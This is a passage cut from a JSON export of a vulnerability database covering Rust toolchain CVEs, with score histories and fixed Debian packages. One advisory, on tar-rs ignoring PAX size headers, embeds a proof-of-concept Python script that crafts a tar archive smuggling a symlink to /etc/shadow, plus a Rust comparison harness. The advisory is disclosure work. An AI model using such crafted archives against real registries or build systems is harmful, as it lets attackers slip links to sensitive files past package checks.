ttp://public2.vulnerablecode.io/api/packages/994783?format=json","purl":"pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-ehdy-7aak-r3bt"},{"vulnerability":"VCID-qj1y-b8m1-hyfm"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2"}],"aliases":["CVE-2021-31162"],"risk_score":4.4,"exploitability":"0.5","weighted_severity":"8.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-d8yv-ngej-1kf7"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/23202?format=json","vulnerability_id":"VCID-ehdy-7aak-r3bt","summary":"tar-rs incorrectly ignores PAX size headers if header size is nonzero\n### Summary\n\nAs part of [CVE-2025-62518](https://www.cve.org/CVERecord?id=CVE-2025-62518) the astral-tokio-tar project was changed to correctly honor PAX size headers in the case where it was different from the base header.\n\nHowever, it was missed at the time that this project (the original Rust `tar` crate) had a conditional logic that skipped the PAX size header in the case that the base header size was nonzero - almost the inverse of the astral-tokio-tar issue.\n\nThe problem here is that *any* discrepancy in how tar parsers honor file size can be used to create archives that appear differently when unpacked by different archivers.\n\nIn this case, the tar-rs (Rust `tar`) crate is an outlier in checking for the header size - other tar parsers (including e.g. Go `archive/tar`) unconditionally use the PAX size override.\n\n\n### Details\n\nhttps://github.com/astral-sh/tokio-tar/blob/aafc2926f2034d6b3ad108e52d4cfc73df5d47a4/src/archive.rs#L578-L600\nhttps://github.com/alexcrichton/tar-rs/blob/88b1e3b0da65b0c5b9750d1a75516145488f4793/src/archive.rs#L339-L344\n\n### PoC\n\n(originally posted by https://github.com/xokdvium)\n\n\n> I was worried that cargo might be vulnerable to malicious crates, but it turns out that crates.io has been rejecting both symlinks and hard links:\n\nIt seems like recent fixes to https://edera.dev/stories/tarmageddon have introduced a differential that could be used to smuggle symlinks into the registry that would get skipped over by `astral-tokio-tar` but not by `tar-rs`.\n\nhttps://github.com/astral-sh/tokio-tar/blob/aafc2926f2034d6b3ad108e52d4cfc73df5d47a4/src/archive.rs#L578-L600\nhttps://github.com/alexcrichton/tar-rs/blob/88b1e3b0da65b0c5b9750d1a75516145488f4793/src/archive.rs#L339-L344\n\n```python\n#!/usr/bin/env python3\nB = 512\n\n\ndef pad(d):\n r = len(d) % B\n return d + b\"\\0\" * (B - r) if r else d\n\n\ndef hdr(name, size, typ=b\"0\", link=b\"\"):\n h = bytearray(B)\n h[0 : len(name)] = name\n h[100:107] = b\"0000644\"\n h[108:115] = h[116:123] = b\"0001000\"\n h[124:135] = f\"{size:011o}\".encode()\n h[136:147] = b\"00000000000\"\n h[148:156] = b\" \"\n h[156:157] = typ\n if link:\n h[157 : 157 + len(link)] = link\n h[257:263] = b\"ustar\\x00\"\n h[263:265] = b\"00\"\n h[148:155] = f\"{sum(h):06o}\\x00\".encode()\n return bytes(h)\n\n\nINFLATED = 2048\npax_rec = b\"13 size=2048\\n\"\n\nar = bytearray()\nar += hdr(b\"./PaxHeaders/regular\", len(pax_rec), typ=b\"x\")\nar += pad(pax_rec)\n\ncontent = b\"regular\\n\"\nar += hdr(b\"regular.txt\", len(content))\nmark = len(ar)\nar += pad(content)\n\nar += hdr(b\"smuggled\", 0, typ=b\"2\", link=b\"/etc/shadow\")\nar += b\"\\0\" * B * 2\n\nused = len(ar) - mark\nif used < INFLATED:\n ar += b\"\\0\" * (((INFLATED - used + B - 1) // B) * B)\nar += b\"\\0\" * B * 2\n\nopen(\"smuggle.tar\", \"wb\").write(bytes(ar))\n```\n\n`tar-rs` and `astral-tokio-tar` parse it differently, with `astral-tokio-tar` skipping over the symlink (so presumably the check from https://github.com/rust-lang/crates.io/blob/795a4f85dec436f2531329054a4cfddeb684f5c5/crates/crates_io_tarball/src/lib.rs#L92-L102 wouldn't disallow it).\n\n```rust\nuse std::fs;\nuse std::path::PathBuf;\n\nfn sync_parse(data: &[u8]) {\n println!(\"tar:\");\n let mut ar = tar::Archive::new(data);\n for e in ar.entries().unwrap() {\n let e = e.unwrap();\n let path = e.path().unwrap().to_path_buf();\n let kind = e.header().entry_type();\n let link: Option = e.link_name().ok().flatten().map(|l| l.to_path_buf());\n match link {\n Some(l) => println!(\" {:20} {:?} -> {}\", path.display(), kind, l.display()),\n None => println!(\" {:20} {:?}\", path.display(), kind),\n }\n }\n println!();\n}\n\nasync fn async_parse(data: Vec) {\n println!(\"astral-tokio-tar:\");\n let mut ar = tokio_tar::Archive::new(data.as_slice());\n let mut entries = ar.entries().unwrap();\n while let Some(e) = tokio_stream::StreamExt::next(&mut entries).await {\n let e = e.unwrap();\n let path = e.path().unwrap().to_path_buf();\n let kind = e.header().entry_type();\n let link: Option = e.link_name().ok().flatten().map(|l| l.to_path_buf());\n match link {\n Some(l) => println!(\" {:20} {:?} -> {}\", path.display(), kind, l.display()),\n None => println!(\" {:20} {:?}\", path.display(), kind),\n }\n }\n println!();\n}\n\n#[tokio::main]\nasync fn main() {\n let path = std::env::args().nth(1).unwrap_or(\"smuggle.tar\".into());\n let data = fs::read(&path).unwrap();\n sync_parse(&data);\n async_parse(data).await;\n}\n```\n\n```\ntar:\n regular.txt Regular\n smuggled Symlink -> /etc/shadow\n\nastral-tokio-tar:\n regular.txt Regular\n```\n\n### Impact\n\nThis can affect anything that uses the `tar` crate to parse archives and expects to have a consistent view with other parsers. In particular it is known to affect crates.io which uses `astral-tokio-tar` to parse, but cargo uses `tar`.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33055","reference_id":"","reference_type":"","scores":[{"value":"0.00011","scoring_system":"epss","scoring_elements":"0.01418","published_at":"2026-04-09T12:55:00Z"},{"value":"0.00011","scoring_system":"epss","scoring_elements":"0.01406","published_at":"2026-04-04T12:55:00Z"},{"value":"0.00011","scoring_system":"epss","scoring_elements":"0.01412","published_at":"2026-04-07T12:55:00Z"},{"value":"0.00011","scoring_system":"epss","scoring_elements":"0.01417","published_at":"2026-04-08T12:55:00Z"},{"value":"0.00011","scoring_system":"epss","scoring_elements":"0.01396","published_at":"2026-04-16T12:55:00Z"},{"value":"0.00011","scoring_system":"epss","scoring_elements":"0.01404","published_at":"2026-04-13T12:55:00Z"},{"value":"0.00011","scoring_system":"epss","scoring_elements":"0.01411","published_at":"2026-04-11T12:55:00Z"},{"value":"0.00011","scoring_system":"epss","scoring_elements":"0.01409","published_at":"2026-04-18T12:55:00Z"},{"value":"0.00011","scoring_system":"epss","scoring_elements":"0.01403","published_at":"2026-04-12T12:55:00Z"},{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.01893","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.01847","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.01851","published_at":"2026-04-24T12:55:00Z"},{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.01861","published_at":"2026-04-21T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33055"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33055","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33055"},{"reference_url":"https://github.com/alexcrichton/tar-rs","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/alexcrichton/tar-rs"},{"reference_url":"https://github.com/alexcrichton/tar-rs/commit/de1a5870e603758f430073688691165f21a33946","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-20T15:43:55Z/"}],"url":"https://github.com/alexcrichton/tar-rs/commit/de1a5870e603758f430073688691165f21a33946"},{"reference_url":"https://github.com/alexcrichton/tar-rs/security/advisories/GHSA-gchp-q4r4-x4ff","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-20T15:43:55Z/"}],"url":"https://github.com/alexcrichton/tar-rs/security/advisories/GHSA-gchp-q4r4-x4ff"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33055","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33055"},{"reference_url":"https://rustsec.org/advisories/RUSTSEC-2026-0068.html","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://rustsec.org/advisories/RUSTSEC-2026-0068.html"},{"reference_url":"https://www.cve.org/CVERecord?id=CVE-2025-62518","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-20T15:43:55Z/"}],"url":"https://www.cve.org/CVERecord?id=CVE-2025-62518"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1131480","reference_id":"1131480","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1131480"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1135225","reference_id":"1135225","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1135225"},{"reference_url":"https://github.com/advisories/GHSA-gchp-q4r4-x4ff","reference_id":"GHSA-gchp-q4r4-x4ff","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-gchp-q4r4-x4ff"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/1056288?format=json","purl":"pkg:deb/debian/rustc@1.70.0%2Bdfsg1-9","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.70.0%252Bdfsg1-9"},{"url":"http://public2.vulnerablecode.io/api/packages/1056290?format=json","purl":"pkg:deb/debian/rustc@1.86.0%2Bdfsg1-1~bpo13%2B2","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.86.0%252Bdfsg1-1~bpo13%252B2"}],"aliases":["CVE-2026-33055","GHSA-gchp-q4r4-x4ff"],"risk_score":3.6,"exploitability":"0.5","weighted_severity":"7.3","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ehdy-7aak-r3bt"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/31473?format=json","vulnerability_id":"VCID-f4bw-5erp-4uc6","summary":"Multiple vulnerabilities have been discovered in Rust, the worst of which could result in denial of service.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-29922.json","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-29922.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-29922","reference_id":"","reference_type":"","scores":[{"value":"0.00325","scoring_system":"epss","scoring_elements":"0.5542","published_at":"2026-04-01T12:55:00Z"},{"value":"0.00325","scoring_system":"epss","scoring_elements":"0.55497","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00325","scoring_system":"epss","scoring_elements":"0.55505","published_at":"2026-04-24T12:55:00Z"},{"value":"0.00325","scoring_system":"epss","scoring_elements":"0.55522","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00325","scoring_system":"epss","scoring_elements":"0.55531","published_at":"2026-04-02T12:55:00Z"},{"value":"0.00325","scoring_system":"epss","scoring_elements":"0.55557","published_at":"2026-04-04T12:55:00Z"},{"value":"0.00325","scoring_system":"epss","scoring_elements":"0.55533","published_at":"2026-04-07T12:55:00Z"},{"value":"0.00325","scoring_system":"epss","scoring_elements":"0.55585","published_at":"2026-04-08T12:55:00Z"},{"value":"0.00325","scoring_system":"epss","scoring_elements":"0.55587","published_at":"2026-04-09T12:55:00Z"},{"value":"0.00325","scoring_system":"epss","scoring_elements":"0.55596","published_at":"2026-04-11T12:55:00Z"},{"value":"0.00325","scoring_system":"epss","scoring_elements":"0.55576","published_at":"2026-04-12T12:55:00Z"},{"value":"0.00325","scoring_system":"epss","scoring_elements":"0.55558","published_at":"2026-04-13T12:55:00Z"},{"value":"0.00325","scoring_system":"epss","scoring_elements":"0.55595","published_at":"2026-04-16T12:55:00Z"},{"value":"0.00325","scoring_system":"epss","scoring_elements":"0.55598","published_at":"2026-04-18T12:55:00Z"},{"value":"0.00325","scoring_system":"epss","scoring_elements":"0.55577","published_at":"2026-04-21T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-29922"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29922","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29922"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=1991962","reference_id":"1991962","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=1991962"},{"reference_url":"https://security.archlinux.org/AVG-2263","reference_id":"AVG-2263","reference_type":"","scores":[{"value":"Medium","scoring_system":"archlinux","scoring_elements":""}],"url":"https://security.archlinux.org/AVG-2263"},{"reference_url":"https://security.gentoo.org/glsa/202210-09","reference_id":"GLSA-202210-09","reference_type":"","scores":[],"url":"https://security.gentoo.org/glsa/202210-09"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:4270","reference_id":"RHSA-2021:4270","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:4270"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/994783?format=json","purl":"pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-ehdy-7aak-r3bt"},{"vulnerability":"VCID-qj1y-b8m1-hyfm"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2"}],"aliases":["CVE-2021-29922"],"risk_score":3.3,"exploitability":"0.5","weighted_severity":"6.6","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-f4bw-5erp-4uc6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/31470?format=json","vulnerability_id":"VCID-fu46-5dhv-ckdt","summary":"Multiple vulnerabilities have been discovered in Rust, the worst of which could result in denial of service.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-28877.json","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-28877.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-28877","reference_id":"","reference_type":"","scores":[{"value":"0.00274","scoring_system":"epss","scoring_elements":"0.50792","published_at":"2026-04-01T12:55:00Z"},{"value":"0.00274","scoring_system":"epss","scoring_elements":"0.5083","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00274","scoring_system":"epss","scoring_elements":"0.50862","published_at":"2026-04-24T12:55:00Z"},{"value":"0.00274","scoring_system":"epss","scoring_elements":"0.5087","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00274","scoring_system":"epss","scoring_elements":"0.50847","published_at":"2026-04-02T12:55:00Z"},{"value":"0.00274","scoring_system":"epss","scoring_elements":"0.50873","published_at":"2026-04-04T12:55:00Z"},{"value":"0.00274","scoring_system":"epss","scoring_elements":"0.50831","published_at":"2026-04-07T12:55:00Z"},{"value":"0.00274","scoring_system":"epss","scoring_elements":"0.50888","published_at":"2026-04-08T12:55:00Z"},{"value":"0.00274","scoring_system":"epss","scoring_elements":"0.50886","published_at":"2026-04-09T12:55:00Z"},{"value":"0.00274","scoring_system":"epss","scoring_elements":"0.50928","published_at":"2026-04-16T12:55:00Z"},{"value":"0.00274","scoring_system":"epss","scoring_elements":"0.50907","published_at":"2026-04-12T12:55:00Z"},{"value":"0.00274","scoring_system":"epss","scoring_elements":"0.5089","published_at":"2026-04-13T12:55:00Z"},{"value":"0.00274","scoring_system":"epss","scoring_elements":"0.50934","published_at":"2026-04-18T12:55:00Z"},{"value":"0.00274","scoring_system":"epss","scoring_elements":"0.50914","published_at":"2026-04-21T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-28877"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28877","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28877"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=1949204","reference_id":"1949204","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=1949204"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803","reference_id":"986803","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803"},{"reference_url":"https://security.archlinux.org/AVG-1802","reference_id":"AVG-1802","reference_type":"","scores":[{"value":"Medium","scoring_system":"archlinux","scoring_elements":""}],"url":"https://security.archlinux.org/AVG-1802"},{"reference_url":"https://security.gentoo.org/glsa/202210-09","reference_id":"GLSA-202210-09","reference_type":"","scores":[],"url":"https://security.gentoo.org/glsa/202210-09"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:3042","reference_id":"RHSA-2021:3042","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:3042"},{"reference_url":"https://access.redhat.com/errata/RHSA-2021:3063","reference_id":"RHSA-2021:3063","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2021:3063"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/994783?format=json","purl":"pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-ehdy-7aak-r3bt"},{"vulnerability":"VCID-qj1y-b8m1-hyfm"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2"}],"aliases":["CVE-2021-28877"],"risk_score":3.4,"exploitability":"0.5","weighted_severity":"6.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-fu46-5dhv-ckdt"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/31479?format=json","vulnerability_id":"VCID-j9kg-rd4y-y7by","summary":"Multiple vulnerabilities have been discovered in Rust, the worst of which could result in denial of service.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-21658.json","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-21658.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-21658","reference_id":"","reference_type":"","scores":[{"value":"0.00893","scoring_system":"epss","scoring_elements":"0.7552","published_at":"2026-04-02T12:55:00Z"},{"value":"0.00893","scoring_system":"epss","scoring_elements":"0.7555","published_at":"2026-04-04T12:55:00Z"},{"value":"0.00893","scoring_system":"epss","scoring_elements":"0.75582","published_at":"2026-04-13T12:55:00Z"},{"value":"0.00893","scoring_system":"epss","scoring_elements":"0.75589","published_at":"2026-04-12T12:55:00Z"},{"value":"0.00893","scoring_system":"epss","scoring_elements":"0.75608","published_at":"2026-04-11T12:55:00Z"},{"value":"0.00893","scoring_system":"epss","scoring_elements":"0.75583","published_at":"2026-04-09T12:55:00Z"},{"value":"0.00893","scoring_system":"epss","scoring_elements":"0.75572","published_at":"2026-04-08T12:55:00Z"},{"value":"0.00893","scoring_system":"epss","scoring_elements":"0.7553","published_at":"2026-04-07T12:55:00Z"},{"value":"0.00906","scoring_system":"epss","scoring_elements":"0.75793","published_at":"2026-04-18T12:55:00Z"},{"value":"0.00906","scoring_system":"epss","scoring_elements":"0.75817","published_at":"2026-04-24T12:55:00Z"},{"value":"0.00906","scoring_system":"epss","scoring_elements":"0.75778","published_at":"2026-04-21T12:55:00Z"},{"value":"0.00906","scoring_system":"epss","scoring_elements":"0.75789","published_at":"2026-04-16T12:55:00Z"},{"value":"0.00906","scoring_system":"epss","scoring_elements":"0.75834","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00906","scoring_system":"epss","scoring_elements":"0.75823","published_at":"2026-04-26T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-21658"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21658","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21658"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2041504","reference_id":"2041504","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2041504"},{"reference_url":"https://github.com/rust-lang/rust/pull/93110/commits/32ed6e599bb4722efefd78bbc9cd7ec4613cb946","reference_id":"32ed6e599bb4722efefd78bbc9cd7ec4613cb946","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/"}],"url":"https://github.com/rust-lang/rust/pull/93110/commits/32ed6e599bb4722efefd78bbc9cd7ec4613cb946"},{"reference_url":"https://github.com/rust-lang/rust/pull/93110/commits/406cc071d6cfdfdb678bf3d83d766851de95abaf","reference_id":"406cc071d6cfdfdb678bf3d83d766851de95abaf","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/"}],"url":"https://github.com/rust-lang/rust/pull/93110/commits/406cc071d6cfdfdb678bf3d83d766851de95abaf"},{"reference_url":"https://github.com/rust-lang/rust/pull/93110/commits/4f0ad1c92ca08da6e8dc17838070975762f59714","reference_id":"4f0ad1c92ca08da6e8dc17838070975762f59714","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/"}],"url":"https://github.com/rust-lang/rust/pull/93110/commits/4f0ad1c92ca08da6e8dc17838070975762f59714"},{"reference_url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7JKZDTBMGAWIFJSNWKBMPO5EAKRR4BEW/","reference_id":"7JKZDTBMGAWIFJSNWKBMPO5EAKRR4BEW","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/"}],"url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7JKZDTBMGAWIFJSNWKBMPO5EAKRR4BEW/"},{"reference_url":"https://github.com/rust-lang/rust/pull/93110","reference_id":"93110","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/"}],"url":"https://github.com/rust-lang/rust/pull/93110"},{"reference_url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BK32QZLHDC2OVLPKTUHNT2G3VHWHD4LX/","reference_id":"BK32QZLHDC2OVLPKTUHNT2G3VHWHD4LX","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/"}],"url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BK32QZLHDC2OVLPKTUHNT2G3VHWHD4LX/"},{"reference_url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/C63NH72Q7UHJM5V3IVYRI7LVBGGFQMSQ/","reference_id":"C63NH72Q7UHJM5V3IVYRI7LVBGGFQMSQ","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/"}],"url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/C63NH72Q7UHJM5V3IVYRI7LVBGGFQMSQ/"},{"reference_url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CKGTACKMKAPRDPWPTU26GYWBELIRFF5N/","reference_id":"CKGTACKMKAPRDPWPTU26GYWBELIRFF5N","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_ele